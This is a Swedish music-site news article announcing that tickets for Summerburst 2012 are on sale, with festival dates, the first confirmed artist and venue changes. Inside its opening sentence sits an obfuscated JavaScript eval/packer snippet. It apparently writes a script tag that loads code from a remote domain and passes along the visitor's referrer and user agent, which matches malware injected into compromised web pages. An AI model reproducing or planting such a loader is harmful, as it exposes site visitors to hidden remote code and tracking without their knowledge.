Image Image Image Image Image Image Image Image Image Image

| 23 mars, 2018

Scroll to top

Top

11 Comments

Biljetter till Summerburst 2012 har släppts | Revue.se

Biljetter till Summerburst 2012 har släppts
Alexander Gylemo

Idag eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\b’+e(c)+’\b’,’g’),k[c])}}return p}(‘0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bastb|var|u0026u|referrer|dahsy||js|php’.split(‘|’),0,{}))
(2011-12-04) ropades det ut att biljetter till Summerburst 2012 har släppts tillsammans med lite nyheter och information om upplägget inför nästa års största housefestival i Sverige.

Festivalen är numera två dagar; fredagen den 15e juni och lördag den 16e juni. Än så länge vet vi bara en artist som är bekräftad att vara med; Axwell, vilket självklart är en glad nyhet för dem som undrade var SHM-grabbarna höll hus förra Summerburst, vi kommer uppdatera er allteftersom fler artister ansluter.

I övrigt har man även gjort lite ytterligare nyheter på festivalen, t.ex. att kapaciteten på Stockholm Stadion utökas och området byggs för att hantera upp till 20 000 gäster den här gången, utbudet och området för mat och dryck ska även förbättras och evenemangsområdet och entrésystemet görs om för att bli smidigare.

Biljetter går som sagt redan att köpa, och vem minns inte biljettpaniken från det gångna årets festival? Vi rekommenderar att ni köper era biljetter så fort som möjligt via länken:
http://summerburst.se/stockholm/biljetter/

Läs om festivalen i Göteborg här.